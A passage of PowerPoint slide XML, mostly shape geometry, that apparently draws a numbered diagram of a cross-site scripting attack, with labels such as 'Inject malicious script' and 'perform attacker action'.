                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8229" y="128133"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356784" y="236879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2778214" y="3757967"/>
            <a:ext cx="290497" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2148926" y="4140789"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4356419"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4322292"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854825" y="3291840"/>
            <a:ext cx="1052830" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inject  malicious  script</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4724400"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73025" y="4731702"/>
            <a:ext cx="2123440" cy="1787525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="447040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1860"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>execute script  embedded in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>as though server  meant us to run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979613" y="5049837"/>
            <a:ext cx="2740025" cy="989330"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2740025" h="989329">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2739988" y="989098"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664177" y="5983512"/>
            <a:ext cx="122530" cy="89026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2223650" y="5196045"/>
            <a:ext cx="2634821" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="5555" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840027" y="4624502"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840027" y="4624502"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
